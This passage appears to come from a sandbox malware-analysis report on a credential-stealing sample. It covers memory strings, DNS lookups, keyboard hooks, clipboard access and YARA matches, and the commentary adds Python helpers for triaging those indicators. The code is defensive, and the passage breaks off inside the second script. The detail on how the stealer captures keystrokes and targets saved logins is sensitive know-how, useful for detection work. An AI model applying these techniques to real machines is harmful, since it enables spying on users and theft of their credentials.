                Source: graias.exe, 00000026.00000002.2107594386.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: graias.exe, 00000026.00000002.2107594386.00000000012ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global traffic DNS traffic detected: DNS query: geoplugin.net
                Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
                Source: global traffic DNS traffic detected: DNS query: www.google.com
                Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
                Source: bhvC4F2.tmp.38.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvC4F2.tmp.38.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvC4F2.tmp.38.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvC4F2.tmp.38.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvC4F2.tmp.38.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
                Source: iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, iGhDjzEiDU.exe, 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: bhvC4F2.tmp.38.dr String found in binary or memory: http://ocsp.digicert.com0
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chromecache_157.13.dr String found in binary or memory: http://schema.org/Organization
                Source: iGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003141000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000006.00000002.1717497130.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: graias.exe, 00000026.00000002.2105157332.0000000000D73000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
                Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
                Source: chpC919.tmp.38.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://aka.ms/certhelp
                Source: chromecache_157.13.dr, chromecache_191.13.dr String found in binary or memory: https://aka.ms/feedback/report?space=61
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://aka.ms/msignite_docs_banner
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://aka.ms/pshelpmechoose
                Source: chromecache_157.13.dr String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
                Source: chromecache_157.13.dr String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
                Source: chromecache_157.13.dr String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
                Source: chpC919.tmp.38.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chpC919.tmp.38.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chpC919.tmp.38.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://channel9.msdn.com/
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
                Source: chpC919.tmp.38.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: chpC919.tmp.38.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chpC919.tmp.38.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/Thraka
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/Youssef1313
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/adegeo
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://github.com/dotnet/try
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/gewarren
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/mairaw
                Source: chromecache_157.13.dr String found in binary or memory: https://github.com/nschonni
                Source: chromecache_157.13.dr String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://learn-video.azurefd.net/vod/player
                Source: graias.exe, 00000026.00000002.2106207732.000000000100F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: graias.exe, 00000026.00000002.2106207732.000000000100F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: graias.exe, 00000026.00000002.2107594386.00000000012ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                Source: graias.exe String found in binary or memory: https://login.yahoo.com/config/login
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://octokit.github.io/rest.js/#throttling
                Source: chromecache_190.13.dr String found in binary or memory: https://schema.org
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
                Source: chromecache_190.13.dr String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
                Source: chpC919.tmp.38.dr String found in binary or memory: https://www.ecosia.org/newtab/
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: graias.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: chpC919.tmp.38.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chromecache_169.13.dr, chromecache_190.13.dr String found in binary or memory: https://www.linkedin.com/cws/share?url=$
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49672
                Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
                Source: unknown Network traffic detected: HTTP traffic on port 50095 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
                Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
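The URL rows above mix three very different origins: strings sitting in the memory of the sample processes (graias.exe, iGhDjzEiDU.exe), strings inside files the sample dropped (the `.38.dr` temp files, process index 38 being graias.exe per its memory-dump ids, which hold copied browser search-engine and certificate data), and strings from the analysis VM's own browser cache (`chromecache_*.13.dr`), DigiCert CRL/OCSP endpoints and the font-vendor metadata embedded in the .NET resources of iGhDjzEiDU.exe. Only the first group yields indicators, e.g. geoplugin.net/json.gp (a geolocation lookup Remcos is known to make, and the one host that also appears as a DNS query) and www.nirsoft.net, which points at a NirSoft-derived credential-recovery component; the login.live.com / google / yahoo URLs in graias.exe memory are credential-store targets rather than C2 and still need an analyst's judgement. The helper below is an added example, not part of the report or of Joe Sandbox: it learns the process-index to image-name mapping from the dump ids in the rows, attributes each host to its holders, and reports which DNS queries are corroborated by sample memory. The sample rows are copied from the report; the noise-host list is an assumption to extend as needed.

```python
"""Attribute the URL and DNS rows of a Joe Sandbox report to their origin.

Added example for this page; not part of the report or of Joe Sandbox.
Three origins are told apart:
  * memory of a sample process (sources ending in .exe),
  * a file dropped by a sample process: "<name>.<N>.dr", where N is the Joe
    Sandbox process index, the same number that leads memory-dump ids such as
    "graias.exe, 00000026...sdmp" (0x26 = 38), so the mapping is learned from
    the rows themselves,
  * everything else (browser cache of the analysis VM, CRL/OCSP endpoints,
    font vendors, framework namespaces), which is noise for indicator purposes.
Rows may carry or lack the column separator that extraction dropped.
"""
import re
from urllib.parse import urlsplit

STRING_RE = re.compile(r"^\s*Source:\s*(?P<src>.*?)\s*String found in binary or memory:\s*(?P<url>\S+)")
DNS_RE = re.compile(r"DNS traffic detected:\s*DNS query:\s*(?P<host>\S+)")
DUMP_RE = re.compile(r"(?P<proc>[\w.-]+\.exe),\s*(?P<idx>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.")
DROPPED_RE = re.compile(r"^(?P<file>.+)\.(?P<idx>\d+)\.dr$")
# Hosts that are never indicators, whoever held them (assumed list, extend as needed).
NOISE_HOSTS = ("digicert.com", "xmlsoap.org", "apache.org", "fontbureau", "fonts.com",
               "founder.com.cn", "galapagosdesign", "goodfont", "jiyu-kobo", "sajatypeworks",
               "sakkal", "sandoll", "tiro.com", "typography.net", "urwpp", "zhongyicts",
               "carterandcone")

def process_map(lines):
    """Learn {process index: image name} from the memory-dump ids in the rows."""
    pm = {}
    for line in lines:
        for m in DUMP_RE.finditer(line):
            pm.setdefault(int(m.group("idx"), 16), m.group("proc"))
    return pm

def sources(src_field):
    """'graias.exe, 00000026...sdmp, chromecache_169.13.dr' -> ['graias.exe', 'chromecache_169.13.dr']"""
    out = []
    for part in (p.strip() for p in src_field.split(",")):
        if part.endswith((".exe", ".dr")) and part not in out:
            out.append(part)
    return out

def triage(lines):
    pm = process_map(lines)
    res = {"process_map": pm, "sample_memory": {}, "dropped_by_sample": {}, "noise": {}, "dns": []}
    for line in lines:
        m = DNS_RE.search(line)
        if m:
            res["dns"].append(m.group("host"))
            continue
        m = STRING_RE.match(line)
        if not m:
            continue
        try:  # concatenated strings ("...srfhttps://...") carry several URLs; the first host will do
            host = urlsplit(m.group("url")).hostname or ""
        except ValueError:
            continue
        if not host:
            continue
        for src in sources(m.group("src")):
            dropped = DROPPED_RE.match(src)
            if any(k in host for k in NOISE_HOSTS):
                bucket = "noise"
            elif src.endswith(".exe"):
                bucket = "sample_memory"
            elif dropped and int(dropped.group("idx")) in pm:
                bucket = "dropped_by_sample"  # e.g. browser profile data the sample copied
            else:
                bucket = "noise"
            holders = res[bucket].setdefault(host, [])
            if src not in holders:
                holders.append(src)
    return res

def corroborated_dns(lines):
    """Hosts both queried over DNS and present in sample memory: the strongest network leads."""
    r = triage(lines)
    return sorted(h for h in set(r["dns"]) if h in r["sample_memory"])

# Rows copied from the report above (constructed input so the script runs stand-alone).
SAMPLE_LINES = [
    "Source: global trafficDNS traffic detected: DNS query: geoplugin.net",
    "Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com",
    "Source: bhvC4F2.tmp.38.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0",
    "Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp",
    "Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: http://polymer.github.io/LICENSE.txt",
    "Source: iGhDjzEiDU.exe, 00000000.00000002.1684799990.0000000003141000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000006.00000002.1717497130.0000000002BB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "Source: iGhDjzEiDU.exe, 00000000.00000002.1708895090.00000000071F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com",
    "Source: graias.exe, 00000026.00000002.2105157332.0000000000D73000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net",
    "Source: chpC919.tmp.38.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=",
]

if __name__ == "__main__":
    r = triage(SAMPLE_LINES)
    for bucket in ("sample_memory", "dropped_by_sample", "noise"):
        print(bucket, r[bucket])
    print("DNS corroborated by sample memory:", corroborated_dns(SAMPLE_LINES))
```

Feed it the whole report and the `sample_memory` bucket is the candidate indicator list; the `dropped_by_sample` bucket is worth a second look because it shows what the stealer copied, while `noise` can be discarded. The host-level noise list is applied before source attribution, so a DigiCert URL stays noise even when it came from a sample-dropped file.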

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Graias\graias.exe
                Source: C:\Windows\SysWOW64\dxdiag.exe Windows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 38_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 39_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Code function: 41_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe Code function: 5_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
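Two kinds of evidence sit side by side in this section. The static row `5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000` is disassembly from process index 5 (the unpacked payload inside iGhDjzEiDU.exe): idHook 0x0D is WH_KEYBOARD_LL (13), a system-wide low-level keyboard hook, with the hook procedure at 0x4099D0. The dynamic rows `Windows user hook set: 0 keyboard low level ...` show a hook actually being installed at runtime, and by which module: the keyboard hook by the dropped copy graias.exe, the mouse hook by dinput8.dll inside dxdiag.exe, which is a system module and has to be judged separately. The `5_2_00409B10` chain (GetForegroundWindow, GetKeyboardLayout, GetKeyboardState, ToUnicodeEx) is what turns hooked virtual-key codes into characters under the foreground window's layout, and the clipboard chains read and write clipboard contents, in two cases from a file. The decoder below is an added example, not part of the report or of Joe Sandbox: it parses both row types, resolves the idHook constant, labels each API chain by capability and flags when the static keyboard hook is corroborated by a runtime hook from a non-system module. The sample rows are copied from the section above; the capability labels and the hook-constant table (values from WinUser.h) are the only assumptions.

```python
"""Decode the "Code function" and "Windows user hook set" rows of a Joe Sandbox report.

Added example for this page; not part of the report or of Joe Sandbox.
A static row like "5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000" carries
idHook 0x0D = WH_KEYBOARD_LL (13) and the hook procedure address 0x4099D0; a dynamic
row "Windows user hook set: 0 keyboard low level <module>" shows the hook really being
installed at runtime and by which module.  Both are decoded so they can be lined up,
and clipboard / keystroke-translation API chains are labelled by capability.
Rows may carry or lack the column separator that extraction dropped.
"""
import re

FUNC_RE = re.compile(r"Source:\s*(?P<proc>\S+?)\s*Code function:\s*(?P<id>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<body>.*)$")
HOOK_SET_RE = re.compile(r"Source:\s*(?P<proc>\S+?)\s*Windows user hook set:\s*\d+\s+"
                         r"(?P<kind>keyboard|mouse)\s+low level\s+(?P<module>\S+)")
# idHook values from WinUser.h
HOOK_TYPES = {0x02: "WH_KEYBOARD", 0x03: "WH_GETMESSAGE", 0x05: "WH_CBT",
              0x07: "WH_MOUSE", 0x0D: "WH_KEYBOARD_LL", 0x0E: "WH_MOUSE_LL"}

def capabilities(apis, hook):
    """Label an API chain (assumed mapping, kept deliberately simple)."""
    s, caps = set(apis), []
    if hook:
        caps.append(f"installs {hook} hook")
    if "ToUnicodeEx" in s or "GetKeyboardState" in s:
        caps.append("keystroke-to-text translation")
    if "GetForegroundWindow" in s:
        caps.append("records active window")
    if "GetClipboardData" in s:
        caps.append("clipboard read")
    if "SetClipboardData" in s:
        caps.append("clipboard write" + (" from file" if "ReadFile" in s else ""))
    return caps

def parse_function(line):
    m = FUNC_RE.search(line)
    if not m:
        return None
    fid, body = m.group("id"), m.group("body").strip()
    if body.endswith(fid):  # the report repeats the function id as a link at the row end
        body = body[:-len(fid)].strip()
    head, _, rest = body.partition(" ")       # "Api,Api,..." or "Api arg,arg,..."
    apis = [a for a in head.split(",") if a]
    args = [a for a in rest.split(",") if a]
    hook = None
    if apis and apis[0].startswith("SetWindowsHookEx") and args:
        idhook = int(args[0], 16)             # first argument of SetWindowsHookEx is idHook
        hook = HOOK_TYPES.get(idhook, f"idHook={idhook}")
    return {"process": m.group("proc"), "id": fid, "apis": apis, "args": args,
            "hook": hook, "capabilities": capabilities(apis, hook)}

def parse_hook_set(line):
    m = HOOK_SET_RE.search(line)
    if not m:
        return None
    module = m.group("module")
    return {"process": m.group("proc"), "kind": m.group("kind"), "module": module,
            "system_module": module.lower().startswith("c:\\windows\\")}

def analyze(lines):
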